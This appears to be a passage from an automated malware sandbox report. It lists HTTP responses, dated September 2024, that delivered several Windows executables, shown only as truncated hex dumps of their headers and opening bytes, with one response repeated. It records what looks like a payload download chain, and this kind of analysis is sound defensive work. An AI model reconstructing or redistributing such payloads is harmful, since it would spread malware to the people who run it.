00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:34:30 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 24 Sep 2024 13:27:18 GMTETag: "e1000-622dd76ee470c"Accept-Ranges: bytesContent-Length: 921600Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2e be f2 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 60 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 4d 44 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 2c a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 2c a5 00 00 00 40 0d 00 00 a6 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:34:40 GMTContent-Type: application/octet-streamContent-Length: 1873408Last-Modified: Tue, 24 Sep 2024 13:28:16 GMTConnection: keep-aliveETag: "66f2be70-1c9600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 60 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4a 00 00 04 00 00 08 3e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 4a 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 49 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6e 72 65 66 64 6d 76 00 80 19 00 00 d0 30 00 00 7c 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 65 6b 66 74 74 61 6d 00 10 00 00 00 50 4a 00 00 04 00 00 00 70 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4a 00 00 22 00 00 00 74 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:35:03 GMTContent-Type: application/octet-streamContent-Length: 320000Last-Modified: Wed, 11 Sep 2024 19:08:04 GMTConnection: keep-aliveETag: "66e1ea94-4e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 67 e5 e1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 08 00 00 00 00 00 00 5e f7 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f7 04 00 4b 00 00 00 00 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 d8 f5 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d7 04 00 00 20 00 00 00 d8 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 05 00 00 06 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f7 04 00 00 00 00 00 48 00 00 00 02 00 05 00 68 e8 04 00 70 0d 00 00 03 00 02 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 49 98 c5 eb e4 07 3d 4e 57 c4 94 0e b8 53 b5 28 8c a4 60 7d 43 e0 bd be a1 50 3f 32 96 e1 7f 68 ee 09 6c 85 3c 41 15 49 09 ba d4 fa f6 43 4e bc b8 ee c3 2f 99 75 8f 13 54 98 eb 94 d5 14 eb ae 0f 0f 40 0b 24 ba 30 ac ba 72 e4 aa c5 d3 22 5f 38 29 4c a5 93 97 73 a9 59 51 ec 11 25 fb 2f 3f dd c0 ca 4c 9f a3 37 65 26 5b d4 7a e2 92 dd eb bd c1 ae 2a 12 e3 6a 2e 9a 38 4a cb f5 ec b2 73 6e a8 3d e2 e0 4f dc a1 c9 e4 7c b2 90 d7 6e b7 f6 87 10 17 67 55 44 47 b4 ac 48 4b 1b 0e e4 87 e2 52 05 54 dc fa e9 31 4c 7a ca d5 dd 7f 0d 46 b5 7f 5e 6c ca b6 79 a8 7b 4a 80 90 42 7c 80 f8 ad 60 9f 6f 48 f3 8c 33 c5 fb 13 ac f3 56 4e d2 d8 66 94 7d 4a 06 87 f6 2f bf 3f 7f b6 89 bf dd e0 a0 b3 da b3 34 6e 45 85 53 86 a8 f1 e1 33 41 b1 d3 72 04 4d 9e 7f 71 66 e7 05 7b 8b 08 d6 a9 8b fd 21 49 55 07 c8 2f b1 4d 85 3f 3e f0 02 88 e8 08 a2 30 e7 65 94 96 58 16 66 e9 0b b0 69 09 55 69 17 02 ad cf a0 60 fc 77 be 88 66 61 b4 fe 4c 77 69 b7 56 4d a0 69 e1 34 ac d
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:36:04 GMTContent-Type: application/octet-streamContent-Length: 192000Last-Modified: Sat, 24 Aug 2024 14:58:01 GMTConnection: keep-aliveETag: "66c9f4f9-2ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 a9 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 00 80 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 ee ce 00 00 00 e0 01 00 00 d0 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 2b 21 00 00 b0 02 00 00 0c 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2a 44 00 00 00 e0 23 00 00 46 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:36:18 GMTContent-Type: application/octet-streamContent-Length: 4278784Last-Modified: Thu, 12 Sep 2024 13:56:06 GMTConnection: keep-aliveETag: "66e2f2f6-414a00"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ba 08 00 00 8c 38 00 00 00 00 00 4c c9 08 00 00 10 00 00 00 d0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 41 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 09 00 78 22 00 00 00 20 0a 00 00 82 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 40 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 b9 08 00 00 10 00 00 00 ba 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 20 2d 00 00 00 d0 08 00 00 2e 00 00 00 be 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 01 0f 00 00 00 00 09 00 00 00 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 78 22 00 00 00 10 09 00 00 24 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 09 00 00 00 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 50 09 00 00 02 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 40 b5 00 00 00 60 09 00 00 b6 00 00 00 12 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 82 37 00 00 20 0a 00 00 82 37 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 41 00 00 00 00 00 00 4a 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:36:54 GMTContent-Type: application/octet-streamContent-Length: 506368Last-Modified: Tue, 10 Sep 2024 19:10:31 GMTConnection: keep-aliveETag: "66e099a7-7ba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 99 28 de 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 3e 06 00 00 7a 01 00 00 00 00 00 3e 5c 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 5b 06 00 4b 00 00 00 00 60 06 00 b0 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 3c 06 00 00 20 00 00 00 3e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 76 01 00 00 60 06 00 00 78 01 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 b8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 34 53 03 00 04 a6 02 00 03 00 00 00 d7 04 00 06 38 f9 05 00 be 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 03 00 00 06 28 04 00 00 06 2a 1e 00 28 fd 04 00 06 2a 1e 00 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 26 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 1c 03 00 04 28 b6 05 00 06 a2 25 17 1f 47 7e 1c 03 00 04 28 b6 05 00 06 a2 25 18 1f 48 7e 1c 03 00 04 28 b6 05 00 06 a2 25 19 1f 65 7e 1c 03 00 04 28 b6 05 00 06 a2 7e 1d 03 00 04 28 ba 05 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1a 00 00 06 13 06 00 73 dd 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 1c 03 00 04 28 b6 05 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e 1c 03 00 04 28 b
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:36:54 GMTContent-Type: application/octet-streamContent-Length: 506368Last-Modified: Tue, 10 Sep 2024 19:10:31 GMTConnection: keep-aliveETag: "66e099a7-7ba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 06 99 28 de 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 3e 06 00 00 7a 01 00 00 00 00 00 3e 5c 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 5b 06 00 4b 00 00 00 00 60 06 00 b0 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 3c 06 00 00 20 00 00 00 3e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 76 01 00 00 60 06 00 00 78 01 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 b8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 34 53 03 00 04 a6 02 00 03 00 00 00 d7 04 00 06 38 f9 05 00 be 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 03 00 00 06 28 04 00 00 06 2a 1e 00 28 fd 04 00 06 2a 1e 00 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 26 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 1c 03 00 04 28 b6 05 00 06 a2 25 17 1f 47 7e 1c 03 00 04 28 b6 05 00 06 a2 25 18 1f 48 7e 1c 03 00 04 28 b6 05 00 06 a2 25 19 1f 65 7e 1c 03 00 04 28 b6 05 00 06 a2 7e 1d 03 00 04 28 ba 05 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1a 00 00 06 13 06 00 73 dd 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 1c 03 00 04 28 b6 05 00 06 6f 18 00 00 0a 13 09 11 09 39 